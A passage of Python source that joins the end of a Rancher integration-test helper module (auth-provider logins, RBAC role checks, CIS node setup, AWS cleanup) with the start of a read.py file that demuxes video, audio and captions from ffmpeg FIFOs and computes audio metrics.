temp = get_user_in_nested_group(sub_group, source)
for user in temp:
if user not in users:
users.append(user)
return users
if nested:
users = get_user_in_nested_group(group, nested_group)
assert len(users) > 0, "no user in the group"
else:
users = nested_group["group_dic"].get(group).get("users")
assert users is not None, "no user in the group"
print("group: {}, users: {}".format(group, users))
return users
def get_a_group_and_a_user_not_in_it(nested=False):
""" return a group or a nested group and a user that is not in the group"""
all_users = nested_group["users"]
for group in nested_group["groups"]:
group_users = get_user_by_group(group, nested)
for user in all_users:
if user not in group_users:
print("group: {}, user not in it: {}".format(group, user))
return group, user
assert False, "cannot find a group and a user not in it"
def get_group_principal_id(group_name, token=ADMIN_TOKEN, expected_status=200):
""" get the group's principal id from the auth provider"""
headers = {'Authorization': 'Bearer ' + token}
r = requests.post(CATTLE_AUTH_PRINCIPAL_URL,
json={'name': group_name,
'principalType': 'group',
'responseType': 'json'},
verify=False, headers=headers)
assert r.status_code == expected_status
return r.json()['data'][0]["id"]
def login_as_auth_user(username, password, login_url=LOGIN_AS_AUTH_USER_URL):
""" login with the user account from the auth provider,
and return the user token"""
r = requests.post(login_url, json={
'username': username,
'password': password,
'responseType': 'json',
}, verify=False)
assert r.status_code in [200, 201]
return r.json()
def validate_service_discovery(workload, scale,
p_client=None, ns=None, testclient_pods=None):
expected_ips = []
pods = p_client.list_pod(workloadId=workload["id"]).data
assert len(pods) == scale
for pod in pods:
expected_ips.append(pod["status"]["podIp"])
host = '{0}.{1}.svc.cluster.local'.format(workload.name, ns.id)
for pod in testclient_pods:
validate_dns_entry(pod, host, expected_ips)
def auth_get_project():
return auth_rbac_data["project"]
def auth_get_namespace():
return auth_rbac_data["namespace"]
def auth_get_user_token(username):
if username in auth_rbac_data["users"].keys():
return auth_rbac_data["users"][username].token
return None
def add_role_to_user(user, role):
"""this function adds a user from the auth provider to given cluster"""
admin_client, cluster = get_global_admin_client_and_cluster()
project = auth_get_project()
ns = auth_get_namespace()
if not (project and ns):
project, ns = create_project_and_ns(ADMIN_TOKEN, cluster,
random_test_name("p-test-auth"))
auth_rbac_data["project"] = project
auth_rbac_data["namespace"] = ns
if role in [PROJECT_OWNER, PROJECT_MEMBER, PROJECT_READ_ONLY]:
assign_members_to_project(admin_client, user, project, role)
else:
assign_members_to_cluster(admin_client, user, cluster, role)
auth_rbac_data["users"][user.username] = user
def auth_resource_cleanup():
""" remove the project and namespace created for the AUTH tests"""
client, cluster = get_global_admin_client_and_cluster()
client.delete(auth_rbac_data["project"])
auth_rbac_data["project"] = None
auth_rbac_data["ns"] = None
for username, user in auth_rbac_data["users"].items():
user_crtbs = client.list_cluster_role_template_binding(userId=user.id)
for crtb in user_crtbs:
client.delete(crtb)
class WebsocketLogParse:
"""
the class is used for receiving and parsing the message
received from the websocket
"""
def __init__(self):
self.lock = Lock()
self._last_message = ''
def receiver(self, socket, skip, b64=True):
"""
run a thread to receive and save the message from the web socket
:param socket: the socket connection
:param skip: if True skip the first char of the received message
"""
while True and socket.connected:
try:
data = socket.recv()
# the message from the kubectl contains an extra char
if skip:
data = data[1:]
if len(data) < 5:
pass
if b64:
data = base64.b64decode(data).decode()
self.lock.acquire()
self._last_message += data
self.lock.release()
except websocket.WebSocketConnectionClosedException:
print("Connection closed")
break
except websocket.WebSocketProtocolException as wpe:
print("Error: {}".format(wpe))
break
@staticmethod
def start_thread(target, args):
thread = Thread(target=target, args=args)
thread.daemon = True
thread.start()
time.sleep(1)
@property
def last_message(self):
return self._last_message
@last_message.setter
def last_message(self, value):
self.lock.acquire()
self._last_message = value
self.lock.release()
def wait_for_cluster_delete(client, cluster_name, timeout=DEFAULT_TIMEOUT):
start = time.time()
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
while cluster_count != 0:
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for cluster to get deleted")
time.sleep(.5)
cluster = client.list_cluster(name=cluster_name).data
cluster_count = len(cluster)
def create_connection(url, subprotocols):
"""
create a webscoket connection and check if it is connected
:param url: the url to connect to
:param subprotocols: the list of subprotocols
:return:
"""
ws = websocket.create_connection(
url=url,
sslopt={"cert_reqs": ssl.CERT_NONE},
subprotocols=subprotocols,
timeout=10,
cookie="R_SESS=" + USER_TOKEN
)
assert ws.connected, "failed to build the websocket"
return ws
def wait_for_hpa_to_active(client, hpa, timeout=DEFAULT_TIMEOUT):
start = time.time()
hpalist = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpalist) == 1
hpa = hpalist[0]
while hpa.state != "active":
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to active")
time.sleep(.5)
hpas = client.list_horizontalPodAutoscaler(uuid=hpa.uuid).data
assert len(hpas) == 1
hpa = hpas[0]
return hpa
def create_pv_pvc(client, ns, nfs_ip, cluster_client):
pv_object = create_pv(cluster_client, nfs_ip)
pvc_name = random_test_name("pvc")
pvc_config = {"accessModes": ["ReadWriteOnce"],
"name": pvc_name,
"volumeId": pv_object.id,
"namespaceId": ns.id,
"storageClassId": "",
"resources": {"requests": {"storage": "10Gi"}}
}
pvc_object = client.create_persistent_volume_claim(pvc_config)
pvc_object = wait_for_pvc_to_be_bound(client, pvc_object, timeout=300)
return pv_object, pvc_object
def create_pv(client, nfs_ip):
pv_name = random_test_name("pv")
pv_config = {"type": "persistentVolume",
"accessModes": ["ReadWriteOnce"],
"name": pv_name,
"nfs": {"readOnly": "false",
"type": "nfsvolumesource",
"path": NFS_SERVER_MOUNT_PATH,
"server": nfs_ip
},
"capacity": {"storage": "50Gi"}
}
pv_object = client.create_persistent_volume(pv_config)
capacitydict = pv_object['capacity']
assert capacitydict['storage'] == '50Gi'
assert pv_object['type'] == 'persistentVolume'
return pv_object
def delete_resource_in_AWS_by_prefix(resource_prefix):
"""
:param resource_prefix: the prefix of resource name
:return: None
"""
# delete nodes of both local and custom clusters
node_filter = [{
'Name': 'tag:Name',
'Values': [resource_prefix + "-*"]
}]
nodes = AmazonWebServices().get_nodes(filters=node_filter)
if nodes is None:
print("deleting the following instances: None")
else:
print("deleting the following instances: {}"
.format([node.public_ip_address for node in nodes]))
AmazonWebServices().delete_nodes(nodes)
# delete load balancer and target groups
tg_list = []
lb_list = []
lb_names = [resource_prefix + '-nlb',
resource_prefix + '-k3s-nlb',
resource_prefix + '-internal-nlb']
for name in lb_names:
lb_arn = AmazonWebServices().get_lb(name)
if lb_arn is not None:
lb_list.append(lb_arn)
res = AmazonWebServices().get_target_groups(lb_arn)
tg_list.extend(res)
print("deleting the following load balancers: {}".format(lb_list))
print("deleting the following target groups: {}".format(tg_list))
for lb in lb_list:
AmazonWebServices().delete_lb(lb)
for tg in tg_list:
AmazonWebServices().delete_target_group(tg)
# delete rds
db_name = resource_prefix + "-db"
print("deleting the database (if it exists): {}".format(db_name))
AmazonWebServices().delete_db(db_name)
# delete the route 53 record
route53_names = [resource_prefix + ".qa.rancher.space.",
resource_prefix + "-internal.qa.rancher.space."]
for name in route53_names:
print("deleting the route53 record (if it exists): {}".format(name))
AmazonWebServices().delete_route_53_record(name)
print("deletion is done")
return None
def configure_cis_requirements(aws_nodes, profile, node_roles, client,
cluster):
i = 0
if profile == 'rke-cis-1.4':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo useradd etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
elif profile == 'rke-cis-1.5':
for aws_node in aws_nodes:
aws_node.execute_command("sudo sysctl -w vm.overcommit_memory=1")
aws_node.execute_command("sudo sysctl -w kernel.panic=10")
aws_node.execute_command("sudo sysctl -w vm.panic_on_oom=0")
aws_node.execute_command("sudo sysctl -w kernel.panic_on_oops=1")
aws_node.execute_command("sudo sysctl -w "
"kernel.keys.root_maxbytes=25000000")
if node_roles[i] == ["etcd"]:
aws_node.execute_command("sudo groupadd -g 52034 etcd")
aws_node.execute_command("sudo useradd -u 52034 -g 52034 etcd")
docker_run_cmd = \
get_custom_host_registration_cmd(client,
cluster,
node_roles[i],
aws_node)
aws_node.execute_command(docker_run_cmd)
i += 1
time.sleep(5)
cluster = validate_cluster_state(client, cluster)
# the workloads under System project to get active
time.sleep(20)
if profile == 'rke-cis-1.5':
create_kubeconfig(cluster)
network_policy_file = DATA_SUBDIR + "/default-allow-all.yaml"
account_update_file = DATA_SUBDIR + "/account_update.yaml"
items = execute_kubectl_cmd("get namespaces -A")["items"]
all_ns = [item["metadata"]["name"] for item in items]
for ns in all_ns:
execute_kubectl_cmd("apply -f {0} -n {1}".
format(network_policy_file, ns))
namespace = ["default", "kube-system"]
for ns in namespace:
execute_kubectl_cmd('patch serviceaccount default'
' -n {0} -p "$(cat {1})"'.
format(ns, account_update_file))
return cluster
def get_node_details(cluster, client):
"""
lists the nodes from the cluster. This cluster has only 1 node.
:return: client and node object
"""
create_kubeconfig(cluster)
nodes = client.list_node(clusterId=cluster.id).data
assert len(nodes) > 0
for node in nodes:
if node.worker:
break
return client, node
def create_service_account_configfile():
client, cluster = get_user_client_and_cluster()
create_kubeconfig(cluster)
name = random_name()
# create a service account
execute_kubectl_cmd(cmd="create sa {}".format(name), json_out=False)
# get the ca and token
res = execute_kubectl_cmd(cmd="get secret -o name", json_out=False)
secret_name = ""
for item in res.split("\n"):
if name in item:
secret_name = item.split("/")[1]
break
res = execute_kubectl_cmd(cmd="get secret {}".format(secret_name))
ca = res["data"]["ca.crt"]
token = res["data"]["token"]
token = base64.b64decode(token).decode()
server = None
nodes = client.list_node(clusterId=cluster.id).data
for node in nodes:
if node.controlPlane:
server = "https://" + node.externalIpAddress + ":6443"
break
assert server is not None, 'failed to get the public ip of control plane'
config = """
apiVersion: v1
kind: Config
clusters:
- name: test-cluster
cluster:
server: {server}
certificate-authority-data: {ca}
contexts:
- name: default-context
context:
cluster: test-cluster
namespace: default
user: test-user
current-context: default-context
users:
- name: test-user
user:
token: {token}
"""
config = config.format(server=server, ca=ca, token=token)
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
with open(config_file, "w") as file:
file.write(config)
return name
def rbac_test_file_reader(file_path=None):
"""
This method generates test cases from an input file and return the result
that can be used to parametrize pytest cases
:param file_path: the path to the JSON file for test cases
:return: a list of tuples of
(cluster_role, command, authorization, service account name)
"""
if test_rbac_v2 == "False":
return []
if file_path is None:
pytest.fail("no file is provided")
with open(file_path) as reader:
test_cases = json.loads(reader.read().replace("{resource_root}",
DATA_SUBDIR))
output = []
for cluster_role, checks in test_cases.items():
# create a service account for each role
name = create_service_account_configfile()
# create the cluster role binding
cmd = "create clusterrolebinding {} " \
"--clusterrole {} " \
"--serviceaccount {}".format(name, cluster_role,
"default:" + name)
execute_kubectl_cmd(cmd, json_out=False)
for command in checks["should_pass"]:
output.append((cluster_role, command, True, name))
for command in checks["should_fail"]:
output.append((cluster_role, command, False, name))
return output
def validate_cluster_role_rbac(cluster_role, command, authorization, name):
"""
This methods creates a new service account to validate the permissions
both before and after creating the cluster role binding between the
service account and the cluster role
:param cluster_role: the cluster role
:param command: the kubectl command to run
:param authorization: if the service account has the permission: True/False
:param name: the name of the service account, cluster role binding, and the
kubeconfig file
"""
config_file = os.path.join(os.path.dirname(os.path.realpath(__file__)),
name + ".yaml")
result = execute_kubectl_cmd(command,
json_out=False,
kubeconfig=config_file,
stderr=True).decode('utf_8')
if authorization:
assert "Error from server (Forbidden)" not in result, \
"{} should have the authorization to run {}".format(cluster_role,
command)
else:
assert "Error from server (Forbidden)" in result, \
"{} should NOT have the authorization to run {}".format(
cluster_role, command)
def wait_until_app_v2_deployed(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
List all installed apps and check for the state of "app_name" to see
if it == "deployed"
:param client: cluster client for the user
:param app_name: app which is being installed
:param timeout: time for the app to come to Deployed state
:return:
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Deployed")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app["metadata"]["name"] == app_name:
if app["status"]["summary"]["state"] == "deployed":
return app_list
app = client.list_catalog_cattle_io_app()
return
def wait_until_app_v2_uninstall(client, app_name, timeout=DEFAULT_APP_V2_TIMEOUT):
"""
list all installed apps. search for "app_name" in the list
if app_name is NOT in list, indicates the app has been uninstalled successfully
:param client: cluster client for the user
:param app_name: app which is being unstalled
:param timeout: time for app to be uninstalled
"""
start = time.time()
app = client.list_catalog_cattle_io_app()
while True:
app_list = []
if time.time() - start > timeout:
raise AssertionError(
"Timed out waiting for state to get to Uninstalled")
time.sleep(.5)
for app in app["data"]:
app_list.append(app["metadata"]["name"])
if app_name not in app_list:
return app_list
app = client.list_catalog_cattle_io_app()
return
def check_v2_app_and_uninstall(client, chart_name):
app = client.list_catalog_cattle_io_app()
for app in app["data"]:
if app["metadata"]["name"] == chart_name:
response = client.action(obj=app, action_name="uninstall")
app_list = wait_until_app_v2_uninstall(client, chart_name)
assert chart_name not in app_list, \
"App has not uninstalled"
def update_and_validate_kdm(kdm_url, admin_token=ADMIN_TOKEN,
rancher_api_url=CATTLE_API_URL):
print("Updating KDM to use {}".format(kdm_url))
header = {'Authorization': 'Bearer ' + admin_token}
api_url = rancher_api_url + "/settings/rke-metadata-config"
kdm_json = {
"name": "rke-metadata-config",
"value": json.dumps({
"refresh-interval-minutes": "1440",
"url": kdm_url
})
}
r = requests.put(api_url, verify=False, headers=header, json=kdm_json)
r_content = json.loads(r.content)
assert r.ok
assert r_content['name'] == kdm_json['name']
assert r_content['value'] == kdm_json['value']
time.sleep(2)
# Refresh Kubernetes Metadata
kdm_refresh_url = rancher_api_url + "/kontainerdrivers?action=refresh"
response = requests.post(kdm_refresh_url, verify=False, headers=header)
assert response.ok
|
read.py
|
#!/usr/bin/python3
# coding: utf-8
import os, sys, stat
import random
import threading
import multiprocessing
import subprocess
import streams.transcribe
import queue
import select
import time,datetime
from fcntl import fcntl, F_GETFL, F_SETFL, ioctl
import cv2
import numpy as np
import re
import select
import setproctitle
from streams.detectors import shot
# TODO:
# structure this more intelligently
def new_frame(frame_num=0):
frame = {}
frame['frame'] = frame_num
# TODO: initialize this properly
frame['frametime'] = ''
# TODO: initialize these properly
#frame['small'] = bytes()
#frame['gray'] = bytes()
#frame['rframe'] = bytes()
# dictates what kind of shot boundary detected
frame['shot_type'] = ''
# edge contours, good for rough estimations
frame['edges'] = []
# proprietary metric
frame['gray_motion_mean'] = 0
# another video break metric
frame['mse'] = 0
# shot break detection score
frame['sbd'] = 0.0
# hulls from motion
frame['motion_hulls'] = []
frame['viewport'] = None
# last shot detected, could be itself
frame['shot_detect'] = 0
# last motion frame detected, could be itself
frame['motion_detect'] = 0
# last audio break detected, could be itself
frame['audio_detect'] = 0
# last scene break detected, could be itself
frame['scene_detect'] = 0
# type of audio detected
frame['audio_type'] = ''
# how long has this frame been breaking?
frame['break_count'] = 0
# zeros in the audio frame - a measure of artificial silence
frame['zeros'] = 0
frame['zcr'] = 0
frame['zcrr'] = 0
frame['ste'] = 0
frame['ster'] = 0
# is this a super quiet scene or not?
frame['isolation'] = False
frame['raudio_max'] = 100
frame['raudio_mean'] = 100
frame['audio_max'] = 100
frame['audio_mean'] = 100
frame['abd_thresh'] = 0
frame['ster_thresh'] = 0
# how much speech is in the frame
frame['speech_level'] = 0.0
frame['ssd_rects'] = []
frame['human_rects'] = []
frame['face_rects'] = []
frame['vehicle_rects'] = []
frame['object_rects'] = []
frame['contrib_rects'] = []
frame['text_rects'] = []
frame['text_hulls'] = []
frame['com_detect'] = None
return frame
#
# given a segment of audio, determine its energy
# check if that energy is in the human band of
# speech.
#
# warning - this has a defect in it that will crash for long
# segments of audio. Needs to be fixed
#
def speech_calc(self,raw_audio):
if len(raw_audio) < 10:
return 0
data_freq = np.fft.fftfreq(len(raw_audio),1.0/self.sample)
data_freq = data_freq[1:]
data_ampl = np.abs(np.fft.fft(raw_audio))
data_ampl = data_ampl[1:]
data_energy = data_ampl ** 2
energy_freq = {}
for (i, freq) in enumerate(data_freq):
if abs(freq) not in energy_freq:
energy_freq[abs(freq)] = data_energy[i] * 2
sum_energy = 0
for f in energy_freq.keys():
if 300<f<3000:
sum_energy += energy_freq[f]
if sum_energy < 1:
return 0
return sum_energy / sum(energy_freq.values())
#
# This is the main thread that processes ffmpeg,
# and muxes everything together out of the fifos
#
class FileVideoStream:
def process(self):
if self.image:
return
#
# self.pipe is the pipe from the ffmpeg subprocess
# self.video_fifo is the video channel from the ffmpeg proces
# self.audio_fifo is the audio channel from the ffmpeg proces
# self.caption_fifo is the caption channel from the ffmpeg proces
# captions are pulled from a filter as they are embedded in the
# video meta data and otherwise lost on the transcode
#
if self.pipe is not None:
self.pipe.terminate()
if self.video_fifo is not None:
os.close(self.video_fifo)
if self.audio_fifo is not None:
os.close(audio_fifo)
if self.caption_fifo is not None:
os.close(caption_fifo)
if os.path.lexists('/tmp/%s_video' % self.name):
os.unlink('/tmp/%s_video' % self.name)
if os.path.lexists('/tmp/%s_audio' % self.name):
os.unlink('/tmp/%s_audio' % self.name)
if os.path.lexists('/tmp/%s_caption' % self.name):
os.unlink('/tmp/%s_caption' % self.name)
os.mkfifo('/tmp/%s_video' % self.name)
os.mkfifo('/tmp/%s_audio' % self.name)
os.mkfifo('/tmp/%s_caption' % self.name)
video_command = []
#
# big assumption: http stream is an MPEGTS and probably a TV source
# TODO: ffmpeg command passthrough. enable / disable logging
#
if self.stream[:4] != 'rtsp':
# probably should do this better
self.stream = str.replace(self.stream,':','\\\:')
self.stream = str.replace(self.stream,'@','\\\@')
video_command = [ '-hide_banner','-loglevel','panic','-hwaccel','vdpau','-y','-f','lavfi','-i','movie=%s:s=0\\\:v+1\\\:a[out0+subcc][out1]' % self.stream,'-map','0:v','-vf','bwdif=0:-1:1,scale=%d:%d:force_original_aspect_ratio=decrease,pad=%d:%d:(ow-iw)/2:(oh-ih)/2' % (self.width,self.height,self.width,self.height),'-pix_fmt','bgr24','-r','%f' % self.fps,'-s','%dx%d' % (self.width,self.height),'-vcodec','rawvideo','-f','rawvideo','/tmp/%s_video' % self.name, '-map','0:a','-acodec','pcm_s16le','-ac','1','-ar','%d' % self.sample,'-f','wav','/tmp/%s_audio' % self.name, '-map','0:s','-f','srt','/tmp/%s_caption' % self.name ]
if self.seek:
video_command[:0] = ['-ss',self.seek]
video_command[:0] = ['ffmpeg']
print('ffmpeg cmd',' '.join(video_command))
self.pipe = subprocess.Popen(video_command)
print('Step 2 initializing video /tmp/%s_video' % self.name)
self.video_fifo = os.open('/tmp/%s_video' % self.name,os.O_RDONLY | os.O_NONBLOCK,self.width*self.height*3*10)
#
# WARNING: your fifo pipe has to be large enough to hold a bunch of video frames. By default its only 1MB, which is
# not very much data. I increased mine to hold 10 frames of 1080 rawvideo
#
# sudo sysctl fs.pipe-max-size=6220800
fcntl(self.video_fifo,1031,6220800)
#
# puny linux default
#fcntl(self.video_fifo,1031,1048576)
print('Step 3 initializing audio /tmp/%s_audio' % self.name)
self.audio_fifo = os.open('/tmp/%s_audio' % self.name,os.O_RDONLY | os.O_NONBLOCK,self.sample*2*10)
#fcntl(self.audio_fifo,1031,1048576)
fcntl(self.audio_fifo,1031,6220800)
# TODO: move this to os.open()
self.caption_fifo = os.open('/tmp/%s_caption' % self.name,os.O_RDONLY | os.O_NONBLOCK,4096)
#
# big assumption rtsp stream is h264 of some kind and probably a security camera
# it does not handle audio, as the audio not actually in the stream. Presumably we could mux it here if it exists
elif self.stream[:4] == 'rtsp':
# we don't need the lavfi command because there are no subs. also, the movie= container for rtsp doesn't let me pass rtsp_transport, which will result in
# dropped packets if I do not do
# also, vdpau is not working for some reason (yuv issues)
#
video_command = [ 'ffmpeg','-nostdin','-re','-hide_banner','-loglevel','panic','-y','-r','%f' % self.fps,'-rtsp_transport','tcp','-i',self.stream,'-map','0:v','-vf','scale=%d:%d:force_original_aspect_ratio=decrease,pad=%d:%d:(ow-iw)/2:(oh-ih)/2' % (self.width,self.height,self.width,self.height),'-pix_fmt','bgr24','-r','%f' % self.fps,'-vcodec','rawvideo','-f','rawvideo','/tmp/%s_video' % self.name ]
self.pipe = subprocess.Popen(video_command)
print('fifo: /tmp/%s_video' %self.name)
self.video_fifo = os.open('/tmp/%s_video' % self.name,os.O_RDONLY | os.O_NONBLOCK,self.width*self.height*3*10)
else:
print("unrecognized input")
return
self.audio_poll = None
self.video_poll = None
self.caption_poll = None
if self.caption_fifo:
self.caption_poll = select.poll()
self.caption_poll.register(self.caption_fifo,select.POLLIN)
if self.video_fifo:
self.video_poll = select.poll()
self.video_poll.register(self.video_fifo,select.POLLIN)
if self.audio_fifo:
self.audio_poll = select.poll()
self.audio_poll.register(self.audio_fifo,select.POLLIN)
print('ffmpeg pid:',self.pipe.pid)
#
# This is the queue that holds everything together
#
def __init__(self, source, queueSize=2048):
self.streams = []
# TODO: if source has ;##:##:## then seek start time to there
self.seek = None
if source[-9] == ';':
self.seek = source[-8:]
source = source[0:-9]
self.stream = source
self.image = False
if self.stream.endswith('.jpg') or self.stream.endswith('.png'):
self.image = True
self.name = 'input_%d_%d' % (os.getpid(),random.choice(range(1,1000)))
self.display = False
if os.environ.get('DISPLAY'):
self.display = True
self.caption_guide = {}
self.filename = None
self.state = None
self.pipe = None
#self.transcribe = None
self.video_fifo = None
self.audio_fifo = None
self.caption_fifo = None
self.age = 0
self.filepos = 0
self.clockbase = 0
self.microclockbase = 0
self.stopped = multiprocessing.Value('i',0)
self.ff = False
# disabled for now.
self.tas = None
#self.tas = TranscribeAudioStream().load()
# initialize the analyzer pipe
self.Q = multiprocessing.Queue(maxsize=queueSize)
def __del__(self):
if self.pipe:
# not cleanly exiting the threads leads to all kinds of problems, including deadlocks
outs, errs = self.pipe.communicate(timeout=15)
self.pipe.poll()
self.pipe.wait()
self.pipe.terminate()
self.pipe.kill()
if self.video_fifo:
os.close(self.video_fifo)
if self.audio_fifo:
os.close(self.audio_fifo)
if self.caption_fifo:
os.close(self.audio_fifo)
# I need to figure out how to get it to reset the console too
if os.path.lexists('/tmp/%s_video' % self.name):
os.unlink('/tmp/%s_video' % self.name)
if os.path.lexists('/tmp/%s_audio' % self.name):
os.unlink('/tmp/%s_audio' % self.name)
if os.path.lexists('/tmp/%s_caption' % self.name):
os.unlink('/tmp/%s_caption' % self.name)
def load(self,width,height,fps,sample,scale=0.2):
setproctitle.setproctitle('v2d main')
self.scale = scale
self.width = width
self.height = height
self.fps = fps
self.sample = sample
self.t = multiprocessing.Process(target=self.update, args=())
self.t.daemon = True
self.t.start()
return self
# this is the demuxer. it puts the video frames into
# a queue. the captions go into neverending hash (never gets pruned)
# audio goes into a neverending place in memory
def update(self):
print("process!",self.stopped.value)
setproctitle.setproctitle('v2d reader')
self.process()
timeout = 0
read_frame = 0
start_talking = 0
no_talking = 0
data_buf = []
last_buf = None
last_scene = 0
rolling_ste = []
last_rms = 100
play_audio = None
raw_audio = bytes()
raw_image = bytes()
# TODO: get this into utils/var
data = new_frame(read_frame)
data['fps'] = self.fps
while self.stopped.value == 0:
bstart = time.time()
# TODO: replace with qmax for both
if self.Q.qsize() == 1023:
print('running fast, sleeping')
if self.Q.qsize() >= 100:
time.sleep(0.01)
if self.Q.qsize() >= self.fps*3:
time.sleep(0.1)
continue
if self.audio_poll is None and self.video_poll is None and self.image is False:
break
###### captions
# 4096 was kind of chosen at random. Its a nonblocking read
if read_frame % self.fps == 0 and self.caption_fifo and self.caption_poll is not None:
# doesn't really need to do this on every frame
events = self.caption_poll.poll(1)
if len(events) > 0 and events[0][1] & select.POLLIN:
raw_subs = os.read(self.caption_fifo,4096)
if raw_subs and len(raw_subs) > 0:
data['caption_time'],data['caption'] = self.parse_caption(raw_subs)
###### audio
# audio is read in, a little bit at a time
if self.audio_fifo and self.audio_poll is not None and data.get('audio') is None:
fail = 0
bufsize = int((self.sample*2/self.fps) - len(raw_audio))
events = self.audio_poll.poll(1)
#print('audio events',events)
if len(events) > 0 and not events[0][1] & select.POLLIN:
self.audio_poll.unregister(self.audio_fifo)
self.audio_poll = None
os.close(self.audio_fifo)
self.audio_fifo = None
print('warning audio error',events[0][1])
continue
while bufsize > 0 and len(events) > 0 and events[0][1] & select.POLLIN:
tmp = os.read(self.audio_fifo,bufsize)
events = self.audio_poll.poll(1)
if tmp is not None:
raw_audio += tmp
bufsize = int((2 * self.sample / self.fps) - len(raw_audio))
if bufsize < 0:
print('warning, negative buf',bufsize)
else:
fail += 1
print("warning audio underrun0",len(raw_audio))
time.sleep(0.001)
if fail > 5:
print("warning audio underrun1",len(raw_audio))
break
if raw_audio is not None and len(raw_audio) == int(self.sample*2/self.fps):
data['audio'] = raw_audio
raw_audio = bytes()
if data is not None and data.get('audio') is not None and data.get('audio_np') is None:
data['audio_np'] = np.fromstring(data['audio'],np.int16)
if play_audio is None:
play_audio = data['audio_np'].copy()
else:
play_audio = np.concatenate((play_audio,data['audio_np']),axis=0)
if(len(play_audio) > self.sample):
play_audio = play_audio[int(self.sample / self.fps):]
# speed up fft by taking a sample
mags2 = np.fft.rfft(abs(play_audio[0::100]))
mags = np.abs(mags2)
amax = max(mags)
amin = min(mags)
variance = np.var(mags)
data['last_abd'] = (amax + amin) / variance
data['last_audio'] = play_audio
data['last_audio_level'] = np.std(abs(play_audio),axis=0)
data['last_audio_power'] = np.sum(abs(play_audio)) / self.sample
local_max2 = np.max(play_audio)
local_max = np.max(play_audio**2)
local_mean = np.mean(play_audio**2)
#print('max',local_max2,local_mean)
# TODO: fix issues with negative sqrts
data['last_rms'] = np.sqrt(local_mean)
data['last_audio_max'] = abs(play_audio).max(axis=0)
data['last_audio_mean'] = abs(play_audio).mean(axis=0)
last = data['last_audio'][0::1000]
# WARNING: compute intensive
data['last_ste'] = sum( [ abs(x)**2 for x in last ] ) / len(last)
#print('last_',data['frame'],data['last_ste'])
#print('last_',data['last_audio_mean'],play_audio_mean,delta)
# TODO: misnamed
data['audio_level'] = np.std(abs(data['audio_np']),axis=0)
data['audio_power'] = np.sum(abs(data['audio_np'])) / self.sample
local_mean = np.mean(data['audio_np']**2)
# TODO: fix issues with negative sqrts
if data['audio_level'] > 0 and local_mean > 0:
data['rms'] = np.sqrt(local_mean)
data['audio_max'] = abs(data['audio_np']).max(axis=0)
data['audio_mean'] = abs(data['audio_np']).mean(axis=0)
# WARNING: compute intensive
data['ste'] = sum( [ abs(x)**2 for x in data['audio_np'][0::100] ] ) / len(data['audio_np'][0:100])
mags2 = np.fft.rfft(abs(data['audio_np']))
mags = np.abs(mags2)
amax = max(mags)
amin = min(mags)
variance = np.var(mags)
data['abd'] = (amax + amin) / (variance + 0.0001)
signs = np.sign(data['audio_np'])
signs[signs == 0] = -1
data['zcr'] = len(np.where(np.diff(signs))[0])/(len(data['audio_np'] + 0.0001))
signs = np.sign(data['last_audio'])
signs[signs == 0] = -1
data['last_zcr'] = len(np.where(np.diff(signs))[0])/(len(data['last_audio'] + 0.0001))
data['ster'] = data['last_ste'] / (data['ste'] + 0.0001)
# it might make sense to reset this on scene breaks
rolling_ste.append(data['ster'])
if len(rolling_ste) > self.fps * 10:
rolling_ste.pop(0)
data['mean_ste'] = np.mean(rolling_ste)
data['pwrr'] = data['audio_power'] / (data['last_audio_power'] + 0.0001)
data['zcrr'] = data['last_zcr'] / (data['zcr'] + 0.0001)
# calculate longest continous zero chain
longest = 0
last = 0
for i,e in enumerate(data['audio_np']):
if e == 0:
longest += 1
if longest > last:
last = longest
else:
longest = 0
data['zeros'] = last
data['speech_level'] = speech_calc(self,data['audio_np'])
#print('last audio',read_frame)
if data['speech_level'] > 0.8:
#print("Talking!",data['speech_level'],read_frame)
start_talking = read_frame
no_talking = 0
else:
no_talking += 1
if (no_talking == 10 and len(play_audio) > int(2*self.sample)):
#print(" Transcribing:",len(play_audio),read_frame,read_frame - start_talking)
if self.tas and self.tas.transcribe:
self.tas.transcribe.stdin.write(play_audio)
start_talking = 0
###### video
if self.image:
data['raw'] = cv2.resize(cv2.imread(self.stream),(self.width,self.height))
elif self.video_fifo and self.video_poll is not None and data.get('raw') is None:
fail = 0
bufsize = self.width*self.height*3 - len(raw_image)
events = self.video_poll.poll(1)
if len(events) > 0 and not events[0][1] & select.POLLIN:
self.video_poll.unregister(self.video_fifo)
self.video_poll = None
os.close(self.video_fifo)
self.video_fifo = None
print('warning video error',events[0][1])
continue
while bufsize > 0 and len(events) > 0 and events[0][1] & select.POLLIN:
tmp = os.read(self.video_fifo,bufsize)
events = self.video_poll.poll(1)
if tmp is not None:
raw_image += tmp
bufsize = self.width*self.height*3 - len(raw_image)
else:
fail += 1
print("warning video underrun0",len(raw_image))
time.sleep(0.001)
if fail > 5:
print("warning video underrun1",len(raw_image))
break
if raw_image is not None and len(raw_image) == self.width*self.height*3:
data['raw'] = np.fromstring(raw_image,dtype='uint8').reshape((self.height,self.width,3))
raw_image = bytes()
if data is not None and data.get('raw') is not None and data.get('rframe') is None:
# crop out letter and pillarbox
# don't do this if we get a null - its a scene break
# TODO: don't do this unless the height and width is changing by a lot
data['small'] = cv2.resize(data['raw'],(int(data['raw'].shape[:2][1] * self.scale),int(data['raw'].shape[:2][0] * self.scale)))
data['tiny'] = cv2.resize(data['raw'],(8,8))
#non_empty_columns = np.int0(np.where(data['small'].max(axis=0) > 0)[0] / self.scale)
# TODO: instead of resizing this, mark a flag
